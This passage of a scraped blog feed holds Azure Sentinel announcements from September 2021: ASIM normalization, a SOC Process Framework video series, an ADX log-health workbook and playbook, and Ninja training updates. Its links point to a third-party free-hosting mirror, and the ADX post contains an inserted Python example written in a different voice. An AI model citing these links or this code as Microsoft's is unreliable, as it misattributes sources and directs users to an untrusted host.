target="_blank" rel="noopener">https://aka.ms/securitywebinars</A>.</P> <P>&nbsp;</P> <UL> <LI><STRONG>ASIM covers more scenarios –&nbsp;</STRONG>We released an updated&nbsp;<A href="#" target="_blank" rel="noopener">network, proxy, and IPS schema</A>. It now clearly documents how to use the network schema to normalize&nbsp;<A href="#" target="_blank" rel="noopener">common network sources</A>&nbsp;such as Firewalls, Proxy Servers, Web Security Gateways, and Intrusion Prevention Systems (IPS). It also adheres more closely to the latest ASIM guidelines.</LI> </UL> <P>&nbsp;</P> <UL> <LI><STRONG>ASIM supports your sources</STRONG>&nbsp;– apart from ASIM harmonizing different sources, ASIM can help you analyze data from specific products, overcoming the limitations of the raw information. 
We now provide product-specific deployment for:</LI> <UL> <LI><A href="#" target="_blank" rel="noopener">Sysmon</A>&nbsp;– providing parsed and normalized events instead of the raw, hard-to-use Sysmon events. Also, it does not matter if you collected the Sysmon events locally to the Event table or used WEF from remote systems: ASIM will combine them all for you in a uniform, easy-to-use format.&nbsp;</LI> <LI>And we also support the upcoming&nbsp;<A href="#" target="_blank" rel="noopener">Sysmon for Linux</A>.</LI> <LI><A href="#" target="_self">Windows Events</A> – Seamlessly use Security Events and the upcoming WEF-collected Windows Events through a single schema.&nbsp;&nbsp;</LI> <LI>Use&nbsp;<A href="#" target="_blank" rel="noopener">Microsoft Defender for IoT – Endpoint</A>&nbsp;to monitor your endpoints without learning a new event structure.</LI> </UL> </UL> <P>&nbsp;</P> <UL> <LI><STRONG>Interested? We have updated the documentation</STRONG>&nbsp;– to help you get value out of ASIM, we have extended and refreshed our documentation. We now have dedicated sections for&nbsp;<A href="#" target="_blank" rel="noopener">ASIM schemas</A>,&nbsp;<A href="#" target="_blank" rel="noopener">ASIM parsers</A>, and&nbsp;<A href="#" target="_blank" rel="noopener">ASIM-based content</A>. And don’t forget our ASIM&nbsp;<A href="#" target="_blank" rel="noopener">intro</A>&nbsp;and&nbsp;<A href="#" target="_blank" rel="noopener">deep dive</A>&nbsp;Webinars!</LI> </UL> <P>&nbsp;</P> <P data-unlink="true">Special thanks to Yaron Fruchtmann and Yuval Naor, who made all this possible.</P> <P>&nbsp;</P> <H2>Why normalization, and what is the <A href="#" target="_blank" rel="noopener">Azure Sentinel Information Model</A>?</H2> <P>Working with various data types and tables together presents a challenge. 
You must become familiar with many different data types and schemas, and write and use a unique set of analytics rules, workbooks, and hunting queries for each, even for those that share commonalities (for example, DNS servers). Correlation between the different data types necessary for investigation and hunting is also tricky.</P> <P>The Azure Sentinel Information Model (ASIM) provides a seamless experience for handling various sources in uniform, normalized views. ASIM aligns with the&nbsp;<A href="#" target="_blank" rel="noopener">Open-Source Security Events Metadata (OSSEM)</A>&nbsp;common information model, promoting vendor-agnostic, industry-wide normalization. ASIM:</P> <P>&nbsp;</P> <UL> <LI>Allows source-agnostic content and solutions</LI> <LI>Simplifies analyst use of the data in Sentinel workspaces</LI> </UL> <P>&nbsp;</P> <P>The current implementation is based on query time normalization using <A href="#" target="_blank" rel="noopener">KQL functions</A> and includes the following:</P> <UL> <LI><STRONG><A href="#" target="_blank" rel="noopener">Normalized schemas</A></STRONG> cover standard sets of predictable event types that are easy to work with and on which to build unified capabilities. The schema defines which fields should represent an event, a normalized column naming convention, and a standard format for the field values.</LI> <LI><STRONG><A href="#" target="_blank" rel="noopener">Parsers</A></STRONG>&nbsp;map existing data to the normalized schemas. Parsers are implemented using KQL functions.</LI> <LI><STRONG><A href="#" target="_blank" rel="noopener">Content for each normalized schema</A></STRONG>&nbsp;includes analytics rules, workbooks, hunting queries, and additional content. 
This content works on any normalized data without the need to create source-specific content.</LI> </UL> <P>&nbsp;</P> <P>Ofer Shezaf</P> <P>Principal Product Manager, Azure Sentinel</P> Wed, 15 Sep 2021 06:00:36 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-information-model-fall-release-speed-amp-ease/ba-p/2749363 Ofer_Shezaf 2021-09-15T06:00:36Z What's New: Azure Sentinel - SOC Process Framework 8 Part Video Series! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-soc-process-framework-8-part-video/ba-p/2662791 <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="SOCProcessFrameworkVideoSeries.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305168i34254E35186BF16C/image-size/large?v=v2&amp;px=999" role="button" title="SOCProcessFrameworkVideoSeries.png" alt="SOCProcessFrameworkVideoSeries.png" /></span></P> <P>&nbsp;</P> <P>In this 8 part video series learn how to use the SOC Process Framework to manage your security team or Security Operations Center. You will hear expert level conversations about the development and implementation of security processes and procedures. 
This SOC-in-a-box approach provides easy-to-customize workflows and a standards-based framework to help you implement and continuously improve the multiple processes and procedures required by any modern security operations team.</P> <P>&nbsp;</P> <P>The SOC Process Framework Workbook is available in the Azure Sentinel Workbook Gallery:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="WorkbookGallery.png" style="width: 593px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308780i1FA3B1913649702F/image-size/large?v=v2&amp;px=999" role="button" title="WorkbookGallery.png" alt="WorkbookGallery.png" /></span></P> <P>&nbsp;</P> <P><STRONG style="font-family: inherit;">Video 1 of an 8 Part Video Series : SOC Process Framework – Overview of the SOC Process Framework</STRONG></P> <P><STRONG>Teaser</STRONG> – An introduction to the SOC Process Framework and why it was developed.</P> <P><STRONG>Message</STRONG> – A conversation between Rin Ure, author of the SOC Process Framework, and Mark Simos, Lead Cyber Security Architect, to provide an overview of the SOC Process Framework and its key components. 
Rin walks through this Azure Sentinel Workbook and explains how you can customize it to implement and mature any sized security team or full-scale Security Operations Center, using industry standards and recommendations.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_2-1629747343989.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305188i7B75A4A9CC6615B3/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_2-1629747343989.png" alt="Rin_Ure_2-1629747343989.png" /></span>&nbsp;<STRONG>Video 1 Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/RnPMwy7AoS0</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 2 of an 8 Part Video Series : SOC Process Framework – High Level Topics</STRONG></P> <P><STRONG>Teaser</STRONG> – How to customize and get started with the SOC Process Framework.</P> <P><STRONG>Message</STRONG> – Rin discusses using the editing capabilities to customize the workbook. 
Topics include Internal Contacts, SOC Roles and Responsibilities, Tools and Resources, and the Microsoft Learn built-in resources.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_3-1629747378837.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305189iEAE997E57C7D8F7F/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_3-1629747378837.png" alt="Rin_Ure_3-1629747378837.png" /></span>&nbsp;<STRONG style="font-family: inherit;">Video 2 Link</STRONG><SPAN style="font-family: inherit;"> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/JYj2_0fF0PY</A>&nbsp;</SPAN></P> <P>&nbsp;</P> <P><STRONG>Video 3 of an 8 Part Video Series : SOC Process Framework – Incident Response Framework &amp; Procedures</STRONG></P> <P><STRONG>Teaser</STRONG> – Deep dive into the Incident Response Framework.</P> <P><STRONG>Message</STRONG> – Rin provides a detailed explanation of the Incident Response Framework, how to work an incident between support groups, and focusing on critical outcomes. Understand why it is necessary to use tags, comments, and bookmarks in the incident to speed up the investigation and ensure measurable KPIs. 
Learn about the importance of a Shift Log to ensure consistency between SOC teams and following an incident from response to remediation and recovery.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_4-1629747400187.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305190iF4B61108B32E6498/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_4-1629747400187.png" alt="Rin_Ure_4-1629747400187.png" /></span>&nbsp;<STRONG>Video 3 Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/zmEmREqCRcY</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 4 of an 8 Part Video Series : SOC Process Framework – Analytical Processes &amp; Procedures</STRONG></P> <P><STRONG>Teaser</STRONG> – Processes and procedures required to improve incident response.</P> <P><STRONG>Message</STRONG> – Rin provides a rundown of the various SOC Analytical Processes and Procedures provided in the workbook. These procedures cover the ability to triage, investigate, and hunt.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_5-1629747413201.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305191i7EA4114D26AB6868/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_5-1629747413201.png" alt="Rin_Ure_5-1629747413201.png" /></span>&nbsp;<STRONG>Video 4 Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/pgcMsv39090</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 5 of an 8 Part Video Series : SOC Process Framework – Operational Processes &amp; Procedures – Part A</STRONG></P> <P><STRONG>Teaser</STRONG> – Document and improve critical teamwork procedures (Part A).</P> <P><STRONG>Message</STRONG> – Learn about the core definition of operational processes and procedures for any sized security team. 
Define your service level agreements, criticality, and procedures for urgency and expedited escalation. Learn about some advanced features, such as search and investigation graph, to improve the investigation process.&nbsp; In this extended session you will also learn about using Microsoft Teams integration to automate the process and collaboration required for incident response. Rin walks through an example triage process, adding tags and custom status flags to improve the engineering process and automation capabilities.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_6-1629747448198.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305192i1FC25FA5D09328B8/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_6-1629747448198.png" alt="Rin_Ure_6-1629747448198.png" /></span>&nbsp;<STRONG>Video 5a Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/J1uUSQTWskU</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 5 of an 8 Part Video Series : SOC Process Framework – Operational Processes &amp; Procedures – Part B</STRONG></P> <P><STRONG>Teaser</STRONG> – Document and improve critical teamwork procedures (Part B).</P> <P><STRONG>Message</STRONG> – Rin defines how SOC teams work on shifts and with other teams, create reports and use these insights to improve SOC processes and procedures to ensure strong teamwork and an optimal working environment for this business-critical capability.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_7-1629747460653.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305193i3ADD5C54CDA68D48/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_7-1629747460653.png" alt="Rin_Ure_7-1629747460653.png" /></span>&nbsp;<STRONG>Video 5b Link</STRONG> –&nbsp;<A href="#" target="_blank" 
rel="noopener">https://youtu.be/HE_sAiJXPqY</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 6 of an 8 Part Video Series : SOC Process Framework – Business Processes &amp; Procedures</STRONG></P> <P><STRONG>Teaser</STRONG> – Develop and improve the efficiency and efficacy of security operations.</P> <P><STRONG>Message</STRONG> – Learn about how to define and track business metrics using the SOC Efficiency Metrics workbook. Understand how Agile SOC Operations can drive continuous improvements to detection and response capabilities. This session also covers the need to document standards, policies, and processes, especially useful for compliance audits.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_8-1629747474457.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305194iBFFF70B30E4E9D78/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_8-1629747474457.png" alt="Rin_Ure_8-1629747474457.png" /></span>&nbsp;<STRONG>Video 6 Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/gRwaqzo91XU</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 7 of an 8 Part Video Series : SOC Process Framework – Technology Processes &amp; Procedures</STRONG></P> <P><STRONG>Teaser</STRONG> – Define and improve the security technology design and architecture.</P> <P><STRONG>Message</STRONG> – Rin and Richard explain why and how to document design processes, technology architectures, identify technology owners, and review regularly to ensure optimal performance for security operations. 
This session also covers the importance of documenting best practices for developing rule queries, alert enrichment, incident creation and other core components of technology configuration.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_9-1629747478191.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305195iC8649D46BEAFC552/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_9-1629747478191.png" alt="Rin_Ure_9-1629747478191.png" /></span>&nbsp;<STRONG>Video 7 Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/CKNVFHchWh4</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 8 of an 8 Part Video Series : SOC Process Framework – SOC Actions</STRONG></P> <P><STRONG>Teaser</STRONG> – Dynamic provisioning of action steps for every incident using watchlists and an Automated Playbook.</P> <P><STRONG>Message</STRONG> – Rin provides a demonstration and walk-through guide for creating dynamic updates to incidents. This solution is created using a playbook and custom watchlists that can associate specific steps to each incident type as it is generated, helping to optimize the Security Analysts' triage process. 
You can customize this approach for your environment and extend this idea for your other uses.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_10-1629747493903.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305196i288142B2DC08BBCA/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_10-1629747493903.png" alt="Rin_Ure_10-1629747493903.png" /></span>&nbsp;<STRONG>Video 8 Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/c3VnQPYEIDY</A>&nbsp;</P> <P>&nbsp;</P> <P>I look forward to reading your comments and hearing your feedback regarding this comprehensive video series.</P> <P>&nbsp;</P> <P><U><STRONG>Reviewers:</STRONG></U></P> <UL> <LI><STRONG>Rin Ure</STRONG> (Principal Security Lead) <UL> <LI>My YouTube Channel:&nbsp;<A href="#" target="_blank" rel="noopener">https://www.youtube.com/channel/UCQBN4fDXmXZTMib7t14fXwA</A>&nbsp;</LI> </UL> </LI> <LI><STRONG>Mark Simos</STRONG> (Dir Business Strategy)</LI> <LI><STRONG>Richard Diver</STRONG> (Sr Business Strategy Mgr)</LI> <LI><STRONG>Paulette Lee</STRONG> (CSG Mgmt)</LI> </UL> Wed, 08 Sep 2021 10:16:19 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-soc-process-framework-8-part-video/ba-p/2662791 RinUre 2021-09-08T10:16:19Z Check the health of your exported Azure Sentinel logs in your ADX cluster https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/check-the-health-of-your-exported-azure-sentinel-logs-in-your/ba-p/2668363 <P><SPAN>More and more Azure Sentinel customers are opting for long-term retention of their logs in Azure Data Explorer (ADX), either due to compliance regulations, or because they still want to be able to perform investigations on their archived logs in the event of a security incident. 
</SPAN></P> <P><SPAN>As the Azure Sentinel ingestion price includes 90 days of retention for free, the option of keeping the logs for longer periods in Azure Data Explorer is preferred by many (see </SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/using-azure-data-explorer-for-long-term-retention-of-azure/ba-p/1883947" target="_blank" rel="noopener"><SPAN>Using Azure Data Explorer for long term retention of Azure Sentinel logs - Microsoft Tech Community</SPAN></A><SPAN>).&nbsp;</SPAN></P> <P>&nbsp;</P> <P>Even though the Azure Sentinel + ADX solution requires little to no maintenance, we wanted to provide a solution for our customers to keep an eye on the number of events and overall status of their ADX clusters and databases.&nbsp;<SPAN>For this reason, <STRONG>we have created two tools: the </STRONG></SPAN><STRONG><A href="#" target="_blank" rel="noopener">ADXvsLA workbook</A> and the <A href="#" target="_self">ADX Health Playbook</A></STRONG>. The workbook will allow you to have a look at the number of logs on Azure Sentinel &amp; ADX and the overall health of your ADX cluster. 
The playbook will send you a warning if an unexpected delay in the ingestion into ADX is detected.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Below, we will describe both in more detail:</P> <P>&nbsp;</P> <H1><FONT size="5">ADXvsLA Workbook</FONT></H1> <P>&nbsp;</P> <P>When you open the workbook, you can select the following parameters:</P> <UL> <LI>the ADX cluster and database,</LI> <LI>the Azure Sentinel workspace from which the logs are exported to that ADX cluster, and</LI> <LI>the time range for which you want to see data.</LI> </UL> <P>Use the Show Help toggle to see a detailed explanation of each section.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="img1.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308805i855F1EB489A4F37C/image-size/large?v=v2&amp;px=999" role="button" title="img1.png" alt="img1.png" /></span></P> <P><FONT size="4"><STRONG>Raw Tables</STRONG></FONT></P> <P>When you ingest logs from Azure Sentinel into ADX, the logs are first ingested into an intermediate table holding the raw data. An update policy runs a function over this raw data and writes the result to the destination table with the correct schema mapping. The raw rows are then discarded, which is why you will typically see that these raw tables are empty. 
The retention policy should also be set for 0 days.</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="img2.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308806iAA971735575B917F/image-size/large?v=v2&amp;px=999" role="button" title="img2.png" alt="img2.png" /></span></P> <P>&nbsp;</P> <P><FONT size="4"><STRONG>Final ADX Tables</STRONG></FONT></P> <P>In this section, you will see information about the final ADX tables, which have the right schema and can be queried from Azure Sentinel. You will find information regarding the row count, size, retention policy and hot cache size etc.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="img3.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308807iE06443C1182BA91E/image-size/large?v=v2&amp;px=999" role="button" title="img3.png" alt="img3.png" /></span></P> <P>&nbsp;</P> <P>Select one of the table names to generate the comparison section. This is where you can see the differences between the table on ADX and on your Log Analytics workspace. 
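To make the comparison concrete, here is an added, stand-alone Python example (my code, not the ADXvsLA workbook or the ADX Health Playbook the post describes) that computes the same columns over constructed timestamps and applies the post's guidance that a lag of 30 minutes or less is expected. It assumes that the ADX count uses the time ADX received each row (that is what allows late rows from the previous window to push the "New in Log Analytics" value below zero); the function names, the 25h/30min playbook window and the sample data are mine.

```python
from datetime import datetime, timedelta, timezone

# The post's guidance: delays of 30 minutes or less between Log Analytics
# and ADX are expected; anything beyond that deserves a look.
EXPECTED_LAG = timedelta(minutes=30)


def compare_tables(la_times, adx_rows, window_start, window_end):
    """Build one comparison row for a table, like the ADXvsLA workbook shows.

    la_times: TimeGenerated of each row in the Log Analytics table.
    adx_rows: (TimeGenerated, time ADX received the row) for each ADX row.
    Assumption (mine): the ADX count uses the time ADX received the row, so
    rows from the previous window that arrived late count in this window.
    """
    la_in = [t for t in la_times if window_start <= t < window_end]
    adx_in = [tg for tg, received in adx_rows if window_start <= received < window_end]
    last_la = max(la_in) if la_in else None
    last_adx = max(adx_in) if adx_in else None
    lag = (last_la - last_adx) if (last_la and last_adx) else None
    return {
        "la_count": len(la_in),
        "adx_count": len(adx_in),
        "new_in_la": len(la_in) - len(adx_in),   # the "New in Log Analytics" column
        "last_la": last_la,
        "last_adx": last_adx,
        "lag": lag,                               # the "LastTM difference"
    }


def needs_attention(row, expected_lag=EXPECTED_LAG):
    """Decide as the post suggests: a positive "New in Log Analytics" value is
    only a problem when the last-timestamp lag exceeds the expected delay."""
    if row["new_in_la"] <= 0:
        return False        # ADX has caught up (or holds late rows from before)
    if row["lag"] is None:
        return True         # one side has no rows at all in the window
    return row["lag"] > expected_lag


def playbook_window(now, lookback=timedelta(hours=25), settle=timedelta(minutes=30)):
    """Default window of the ADX Health Playbook: the last 25h minus the most
    recent 30 minutes, so rows still in flight to ADX are not counted."""
    return now - lookback, now - settle


# ---- constructed sample data (not from the post) ----------------------------
NOW = datetime(2021, 9, 8, 9, 0, tzinfo=timezone.utc)
MINUTE = timedelta(minutes=1)
# one event per minute for the last 24 hours in Log Analytics
LA_EVENTS = [NOW - timedelta(hours=24) + i * MINUTE for i in range(24 * 60)]


def exported(events, delay=timedelta(minutes=12)):
    """ADX rows for the given events, each received `delay` after TimeGenerated."""
    return [(t, t + delay) for t in events]


# healthy export: everything but the last few minutes has reached ADX
ADX_HEALTHY = [(t, r) for t, r in exported(LA_EVENTS) if r < NOW]
# stalled export: nothing has reached ADX for two hours
ADX_STALLED = [(t, r) for t, r in exported(LA_EVENTS) if r < NOW - timedelta(hours=2)]
# late rows: 10 events from before the window arrived in ADX during the window
PREVIOUS_DAY = [NOW - timedelta(hours=24) - i * MINUTE for i in range(1, 11)]
ADX_LATE = exported(LA_EVENTS, delay=timedelta(0)) + [
    (t, NOW - timedelta(hours=23)) for t in PREVIOUS_DAY
]

if __name__ == "__main__":
    workbook_window = (NOW - timedelta(hours=24), NOW)
    for name, rows in (("healthy", ADX_HEALTHY), ("late rows", ADX_LATE)):
        row = compare_tables(LA_EVENTS, rows, *workbook_window)
        print(name, row["new_in_la"], row["lag"], needs_attention(row))
    row = compare_tables(LA_EVENTS, ADX_STALLED, *playbook_window(NOW))
    print("stalled", row["new_in_la"], row["lag"], needs_attention(row))
```

Run over the constructed data, the healthy export shows 12 rows "new in Log Analytics" with a 12-minute lag (expected), the late-rows case shows -10 with no lag (nothing to do), and the stalled export shows a lag well over 30 minutes, which is the only case the playbook-style check reports.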
Then, select the time range for which you want to see the comparison.</P> <P>In the table you will find:</P> <UL> <LI>The number of entries in ADX, in Log Analytics, and the difference in number of logs between them.</LI> <LI>How long it has been since the last log was received</LI> <LI>The timestamp of the last logs.</LI> <LI>The number of new logs received in Log Analytics since the last log in ADX was received</LI> </UL> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="img4.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308808i5889FC6565027F69/image-size/large?v=v2&amp;px=999" role="button" title="img4.png" alt="img4.png" /></span></P> <P>&nbsp;</P> <P class="lia-align-justify lia-indent-padding-left-30px">Notice the <STRONG>New in Log Analytics column</STRONG></P> <UL> <LI style="list-style-type: none;"> <UL> <LI>In the screenshot, you can see there are 52 logs in the "New in Log Analytics" column. This means that, at the time we compared the tables, there were 52 entries that had not reached ADX yet. <BR />If this happens, you should compare the timestamp and the difference for the last log that was received. In this case, it is around 15 minutes. Delays of 30 minutes or less are expected, so this means your tables are working as expected.</LI> <LI>It is also possible that you see a negative number in the New in Log Analytics column. This could happen if, due to the lag in ADX, there were Log Analytics logs from the previous period that were received in ADX during the current period. Let's suppose that you ingested 1000 logs in Log Analytics on the previous 24h window, but only 990 reached ADX in that period; and then you ingested 1000 logs again on the current 24h window, and all those logs, plus the 10 logs from the previous day, reached ADX. In this case, you will see that the "New in Log Analytics" column would say -10. 
In these cases, you only need to look at the LastTM difference. If it is around 30 minutes or less, then it will be fine.</LI> </UL> <P>&nbsp;</P> </LI> </UL> <P>Finally, at the bottom of the workbook you will see metrics regarding events received, events dropped, received data, volume and other metrics.</P> <P>&nbsp;</P> <H1><FONT size="5">ADX Health Playbook</FONT></H1> <P>&nbsp;</P> <P>The ADX Health Playbook compares the number of logs in your Azure Sentinel tables and ADX tables periodically (every 24h by default) and sends you a warning via email if it detects a difference in the number of logs that may require your attention (that is, in the "New in Log Analytics" column mentioned previously). As it takes logs a few minutes to reach ADX after having been ingested into Log Analytics, the query in the playbook by default looks back at the period between the last 25h and last 30min.</P> <P>Please read the accompanying <A href="#" target="_self">readme.md file on GitHub</A> to set it up.</P> <P>&nbsp;</P> <P>We hope you find these tools useful! If you have any suggestions for improving this content or any questions, please leave us a comment.</P> Wed, 08 Sep 2021 09:43:58 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/check-the-health-of-your-exported-azure-sentinel-logs-in-your/ba-p/2668363 NChristis 2021-09-08T09:43:58Z Azure Sentinel Ninja Training - the Sept 2021 update https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-ninja-training-the-sept-2021-update/ba-p/2677688 <P>It's that time of year again... time for another update of the Azure Sentinel Ninja training! (access the training <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/become-an-azure-sentinel-ninja-the-complete-level-400-training/ba-p/1246310" target="_blank" rel="noopener">here</A>)</P> <P>&nbsp;</P> <P>In this post I'll list the new and updated modules with important new features for the ninja training. 
As per usual with the ninja training updates, there have been many changes to Azure Sentinel in this time and the updates found here should not be considered exhaustive. To keep up to date with all the new features being released in Azure Sentinel, make sure you regularly monitor our <A href="#" target="_blank" rel="noopener">what's new page</A>.</P> <P>&nbsp;</P> <H2>Azure Sentinel Ninja Training Certification</H2> <P>An important update to the training is the release of the Azure Sentinel Ninja Training knowledge check. This has already been announced in a separate blog post but for completeness it has also been included in this update post. You can take the <A href="#" target="_blank" rel="noopener">knowledge check</A> and if you score over 80%, you can fill in the <A href="#" target="_blank" rel="noopener">self-attestation form</A> to receive an Azure Sentinel Ninja Training certification.&nbsp;</P> <P>&nbsp;</P> <P><EM>Note: it can take up to one business day for you to receive your certificate via email.</EM> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</P> <P>&nbsp;</P> <H2 id="toc-hId-1931980402">New and updated modules&nbsp;</H2> <P>New modules that cover new functionality areas in Azure Sentinel:</P> <UL> <LI>Module X: Migration</LI> <LI>Module Y: Notebooks</LI> <LI>Module Z: ASIM and Normalization</LI> </UL> <P>&nbsp;</P> <P><SPAN>Also, several modules have been expanded:</SPAN></P> <UL> <LI><SPAN>Module 3: Workspace and tenant architecture - expanded to cover more MSSP/multi-tenant scenario guidance.</SPAN></LI> <LI><SPAN>Module 4: Data collection - expanded to cover the Azure Monitor Agent (AMA).</SPAN></LI> <LI><SPAN>Module 8: Analytics - expanded to cover SOC-ML anomalies and&nbsp;Fusion ML Detections with Scheduled Analytics Rules.</SPAN></LI> <LI>Module 11: Use cases and solutions - added content about the Solutions gallery.</LI> <LI>Module 12: Handling incidents - covers Teams integration with Sentinel.</LI> <LI>Module 13: Hunting - updated to reflect the 
new hunting dashboard.&nbsp;</LI> </UL> <P>&nbsp;</P> <H2 id="toc-hId-124525939">New and updated webinars</H2> <UL> <LI>Module 4: Data collection - a new webinar covering data collection scenarios.</LI> <LI>Module 5: Log Management - a new webinar that covers using Azure Data Explorer for long-term retention of Azure Sentinel logs.</LI> <LI>Module 15: Monitoring Azure Sentinel's health - a new webinar that covers cost management in Azure Sentinel.</LI> </UL> <P>&nbsp;</P> <H2 id="toc-hId-124525939">Azure Sentinel webinars coming soon</H2> <UL> <LI>Learn About Customizable Anomalies and How to Use Them - Sept 14</LI> <LI>Azure Sentinel | What's New in the Last 6 Months - Sept 15</LI> <LI>Turbocharging ASIM: Making Sure Normalization Helps Performance Rather Than Impacting It - Oct 6</LI> <LI>SAP Mini-Series Part 1: Introduction to Monitoring SAP with Azure Sentinel for Security Professionals - Oct 18</LI> <LI>Explore the Power of Threat Intelligence in Azure Sentinel - Oct 25</LI> <LI>What’s New in Azure Sentinel Automation - Oct 28</LI> <LI>SAP Mini-Series Part 2: Deep Dive - End-to-End Installation of SAP for Azure Sentinel - Nov 9</LI> <LI>Decrease Your SOC’s MTTR (Mean Time to Respond) by Integrating Azure Sentinel with Microsoft Teams - Nov 10</LI> <LI>Create Your Own Azure Sentinel Solutions - Nov 16</LI> <LI>Everything You Ever Wanted to Know About Using the New Azure Monitor Agent (AMA) with Azure Sentinel - Nov 22</LI> </UL> <P>&nbsp;</P> <P><FONT>You can sign up for webinars <A href="#" target="_blank" rel="noopener">here</A>. Please note that the <STRONG>registration links</STRONG> will be made available approximately two weeks before the webinar. 
Until then, all dates are tentative.</FONT></P> Wed, 08 Sep 2021 09:07:10 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-ninja-training-the-sept-2021-update/ba-p/2677688 Sarah_Young 2021-09-08T09:07:10Z Introducing: Azure Sentinel Data Exploration Toolset (ASDET) https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-data-exploration-toolset-asdet/ba-p/2712728 <P><FONT size="6">Introducing: Azure Sentinel Data Exploration Toolset (ASDET)</FONT></P> <P>&nbsp;</P> <H1><FONT size="5">What’s ASDET and why should you use it?</FONT></H1> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; Security Analysts deal with extremely large datasets in Azure Sentinel, making it challenging to analyze them efficiently for anomalous data points. We sought to streamline the data analysis process by developing a notebook-based toolset that reduces the data to a more manageable form, allowing analysts to gain a better understanding of their dataset and detect anomalies in it. Our toolset has three main components that each provide a different way of turning raw data into useful insights: data inference, feature engineering, and anomaly detection.</P> <P>&nbsp;</P> <P>&nbsp; &nbsp; &nbsp; This project is a set of Python modules intended for use in Jupyter notebooks. These, along with sample notebooks, are open source and available on GitHub for use by the community. 
